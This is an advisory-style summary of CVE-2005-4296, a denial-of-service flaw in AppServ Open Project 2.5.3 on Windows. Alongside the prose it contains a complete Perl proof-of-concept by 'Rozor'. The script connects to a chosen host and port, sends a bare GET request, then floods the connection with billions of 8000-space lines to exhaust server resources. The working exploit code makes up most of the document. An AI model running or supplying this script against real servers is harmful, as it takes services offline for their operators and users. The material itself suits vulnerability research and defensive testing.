CVE-2005-4296

A remote attacker can send a very large HTTP request to the vulnerable server. The exploit script sends a GET request followed by a large amount of space characters, repeatedly. This large request consumes server resources, ultimately causing a denial of service. [ref_id=1]

The vulnerability affects AppServ Open Project version 2.5.3, particularly when running on Microsoft Windows platforms. The exact code paths or functions responsible for handling HTTP requests are not specified in the provided information.

The advisory does not provide details on a specific patch or fix. It indicates that AppServ Open Project 2.5.3 running on Microsoft Windows platforms is affected, and other versions may also be vulnerable. Users are advised to consult vendor advisories for remediation guidance.

```perl #appserv-dos.pl #!C:\Perl\perl.exe #C:\>perl appserv-dos.pl <tested ip> <port> #By Rozor - !Sub_Level Security Investigation #Thank To Miseo #Tested In LocalHost.

sub banner { print("--------------------------------------------\n"); print("| |\n"); print("| Proof Of Concept AppServ 2.5.3 DoS |\n"); print("| C:\>appserv-dos.pl <target> <port |\n"); print("| |\n"); print("| By Rozor - !Sub_Level Research |\n"); print("| |\n"); print("---------------------------------------------\n"); } die banner() unless $ARGV[0]; die banner() unless $ARGV[1];

use IO::Socket::INET;

my $host = $ARGV[0]; my $port = $ARGV[1]; my $space = "\x20"; my $i; my $l; my $j;

for ($i=0; $i<8000; $i++) { $l.="\x20"; } print "\n\nAppServ 2.5.3 DoS Proof Of Concept\n .:By Rozor:. !Sub_Level\n"; print "Attack...\n"; my $sock = IO::Socket::INET->new(PeerAddr => $host, PeerPort => $port, Proto => 'tcp') ||

die "Error: Conection reused$@\n"; my $buffer="GET / HTTP/1.0\n"; my $m = "$l\n"; send($sock,$buffer,0) || die "Error: Send not found\n"; for($l= 0; $l <8000000000; $l++) { print "[ $l - 8000000000 ]\r"; send($sock,$m,0) || die "Error: Send not found\n"; } print "\nServer DoS Hack\n"; close($sock); ```